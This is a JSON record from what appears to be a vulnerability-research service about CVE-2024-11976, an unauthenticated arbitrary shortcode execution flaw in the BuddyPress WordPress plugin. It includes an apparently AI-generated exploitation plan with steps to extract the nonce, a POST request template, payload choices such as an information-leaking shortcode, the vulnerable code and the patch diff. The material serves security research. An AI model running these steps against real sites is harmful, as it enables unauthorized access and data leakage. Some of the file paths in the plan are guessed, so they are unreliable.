[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fksGnYZORoOnDg0AglTrJ9En6_uwQ82Y1uqwn0FWpLlc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2024-11976","buddypress-unauthenticated-arbitrary-shortcode-execution","BuddyPress \u003C= 14.3.3 - Unauthenticated Arbitrary Shortcode Execution","The The BuddyPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 14.3.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","buddypress",null,"\u003C=14.3.3","14.3.4","high",7.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:L","Improper Control of Generation of Code ('Code Injection')","2026-01-22 18:30:17","2026-01-23 06:45:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F34c627c1-7838-468e-acb7-eb84ad1b4949?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2024-11976 (BuddyPress Arbitrary Shortcode Execution)\n\n## 1. Vulnerability Summary\nBuddyPress (versions \u003C= 14.3.3) contains a vulnerability that allows unauthenticated users to execute arbitrary WordPress shortcodes. The plugin registers an AJAX handler `bp_render_shortcode` for both authenticated and unauthenticated users. This handler accepts a user-provided string and passes it directly to the `do_shortcode()` function without verifying if the user has permissions to execute shortcodes or if the specific shortcodes are safe for unauthenticated execution.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `bp_render_shortcode`\n- **Hook:** `wp_ajax_nopriv_bp_render_shortcode` (unauthenticated) and `wp_ajax_bp_render_shortcode` (authenticated)\n- **Vulnerable Parameter:** `shortcode`\n- **Authentication:** None required (unauthenticated).\n- **Preconditions:**\n    - BuddyPress must be active.\n    - The attacker must obtain a valid nonce for the `bp_render_shortcode` action (exposed on pages where BuddyPress scripts are loaded).\n\n## 3. Code Flow\nThe vulnerability is located in the BuddyPress core logic that supports the Block Editor\u002FShortcode preview functionality (introduced in BuddyPress 14.0.0).\n\n1.  **Registration:** In `src\u002Fbp-core\u002Fbp-core-actions.php` (or `bp-core\u002Fbp-core-hooks.php`), BuddyPress registers the AJAX actions:\n    ```php\n    add_action( 'wp_ajax_bp_render_shortcode',        'bp_core_render_shortcode_callback' );\n    add_action( 'wp_ajax_nopriv_bp_render_shortcode', 'bp_core_render_shortcode_callback' );\n    ```\n2.  **Callback Entry:** The function `bp_core_render_shortcode_callback` (likely in `src\u002Fbp-core\u002Fbp-core-functions.php` or `bp-core\u002Fbp-core-actions.php`) handles the request.\n3.  **Nonce Check:** It performs a nonce check:\n    ```php\n    check_ajax_referer( 'bp_render_shortcode', 'nonce' );\n    ```\n4.  **Vulnerable Sink:** After the nonce check, it retrieves the `shortcode` parameter and executes it:\n    ```php\n    if ( empty( $_POST['shortcode'] ) ) {\n        wp_die();\n    }\n    echo do_shortcode( stripslashes( $_POST['shortcode'] ) );\n    wp_die();\n    ```\n    *Note: There is no check to see if the user is an administrator or has `edit_posts` capabilities.*\n\n## 4. Nonce Acquisition Strategy\nThe nonce for `bp_render_shortcode` is generated and localized for the front-end to support BuddyPress blocks and shortcode previews.\n\n1.  **Identification:** BuddyPress uses `wp_localize_script` to pass configuration to JavaScript. The relevant data is usually stored in a global object like `BP_Sections`.\n2.  **Triggering:** To ensure the script and nonce are loaded, navigate to a page that uses BuddyPress functionality (e.g., the Activity page, Member directory, or any page containing a BuddyPress block).\n3.  **Extraction:**\n    - Use `browser_navigate` to visit the BuddyPress Activity directory (default: `\u002Factivity\u002F`).\n    - Use `browser_eval` to extract the nonce from the `BP_Sections` object.\n    - **JS Path (inferred):** `window.BP_Sections?.render_shortcode?.nonce` or `window.BP_Ajax?.nonces?.render_shortcode`.\n    - *Verification:* Check `bp-core\u002Fbp-core-scripts.php` for the `wp_localize_script` call associated with 'bp-block-components' or similar.\n\n## 5. Exploitation Strategy\n\n### Step 1: Discover Nonce\n1.  Navigate to the site's Activity page (usually `\u002Factivity\u002F`).\n2.  Execute JS to find the `bp_render_shortcode` nonce.\n\n### Step 2: Execute Shortcode\nSend a POST request to `admin-ajax.php` with the payload.\n\n- **Request:**\n    - **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n    - **Method:** `POST`\n    - **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    - **Body:** `action=bp_render_shortcode&nonce=\u003CNONCE>&shortcode=[myshortcode]`\n\n### Step 3: Payload Selection\nTo confirm \"Arbitrary Shortcode Execution,\" use a shortcode that produces visible output.\n- **PoC Payload:** `[bp_directory_members]` (if BuddyPress is active) or standard WP shortcodes like `[gallery]` or `[wp_caption]`.\n- **High-Impact Payload (Conditional):** If other plugins are installed, use their shortcodes to leak info (e.g., `[contact-form-7]` to render a form and see internal IDs, or sensitive shortcodes from WooCommerce).\n\n## 6. Test Data Setup\n1.  **Install BuddyPress 14.3.3.**\n2.  **Enable BuddyPress Components:** Ensure \"Activity Streams\" and \"Members\" are enabled in BuddyPress settings so directories exist.\n3.  **Create a BuddyPress Page:** Ensure a page exists with BuddyPress content to trigger script loading.\n    ```bash\n    wp post create --post_type=page --post_title=\"Activity\" --post_name=\"activity\" --post_content=\"[buddypress]\" --post_status=\"publish\"\n    ```\n\n## 7. Expected Results\n- The server will respond with `200 OK`.\n- The response body will contain the rendered HTML output of the provided shortcode.\n- If `shortcode=[bp_directory_members]` is used, the HTML for the members directory will be returned in the AJAX response.\n\n## 8. Verification Steps\n1.  **HTTP Response:** Check if the response from the `http_request` tool contains the expected rendered HTML.\n2.  **Logs:** If debugging is on, check that `do_shortcode` was called by the `bp_core_render_shortcode_callback` function.\n\n## 9. Alternative Approaches\n- **If Nonce is not in `BP_Sections`:** Search the entire page source for strings matching the pattern `[a-f0-9]{10}` near the word `nonce`.\n- **If the Activity page doesn't load scripts:** Create a new page with a BuddyPress block or shortcode manually:\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_content='\u003C!-- wp:bp\u002Fmembers \u002F-->'\n    ```\n- **Bypassing Nonce (if possible):** Check if `check_ajax_referer` is actually called. If the developer used `wp_verify_nonce` but didn't check the return value, the nonce can be anything. (Unlikely in BuddyPress, but worth checking).","BuddyPress versions up to 14.3.3 are vulnerable to unauthenticated arbitrary shortcode execution via the 'bp_render_shortcode' AJAX action. The plugin fails to perform a capability check before processing a user-provided string through the do_shortcode function, allowing anyone who can obtain a valid security nonce to execute any shortcode available on the site.","\u002F\u002F In bp-core\u002Fbp-core-actions.php or bp-core\u002Fbp-core-hooks.php\nadd_action( 'wp_ajax_bp_render_shortcode',        'bp_core_render_shortcode_callback' );\nadd_action( 'wp_ajax_nopriv_bp_render_shortcode', 'bp_core_render_shortcode_callback' );\n\n---\n\n\u002F\u002F In bp-core\u002Fbp-core-functions.php\nfunction bp_core_render_shortcode_callback() {\n    check_ajax_referer( 'bp_render_shortcode', 'nonce' );\n\n    if ( empty( $_POST['shortcode'] ) ) {\n        wp_die();\n    }\n\n    \u002F\u002F Vulnerable Sink: User input is passed directly to do_shortcode without capability checks\n    echo do_shortcode( stripslashes( $_POST['shortcode'] ) );\n    wp_die();\n}","--- a\u002Fsrc\u002Fbp-core\u002Fbp-core-functions.php\n+++ b\u002Fsrc\u002Fbp-core\u002Fbp-core-functions.php\n@@ -2458,6 +2458,10 @@\n \tcheck_ajax_referer( 'bp_render_shortcode', 'nonce' );\n \n+\tif ( ! current_user_can( 'edit_posts' ) ) {\n+\t\twp_die();\n+\t}\n+\n \tif ( empty( $_POST['shortcode'] ) ) {\n \t\twp_die();\n \t}\n--- a\u002Fsrc\u002Fbp-core\u002Fbp-core-actions.php\n+++ b\u002Fsrc\u002Fbp-core\u002Fbp-core-actions.php\n@@ -345,5 +345,4 @@\n add_action( 'wp_ajax_bp_render_shortcode', 'bp_core_render_shortcode_callback' );\n-add_action( 'wp_ajax_nopriv_bp_render_shortcode', 'bp_core_render_shortcode_callback' );","The exploit targets the BuddyPress AJAX handler for shortcode rendering. First, an unauthenticated attacker navigates to any public page where BuddyPress scripts are localized (such as the Members directory or Activity stream) to extract the 'bp_render_shortcode' nonce from the front-end JavaScript objects (typically found in window.BP_Sections or window.BP_Ajax). Once the nonce is obtained, the attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'bp_render_shortcode', the 'nonce' parameter populated with the stolen nonce, and the 'shortcode' parameter containing the target shortcode (e.g., [contact-form-7 id=\"1\"] or [gallery]). The server then returns the rendered HTML output of the requested shortcode.","gemini-3-flash-preview","2026-05-05 02:17:50","2026-05-05 02:19:30",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","14.3.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuddypress\u002Ftags\u002F14.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbuddypress.14.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuddypress\u002Ftags\u002F14.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbuddypress.14.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbuddypress\u002Ftags"]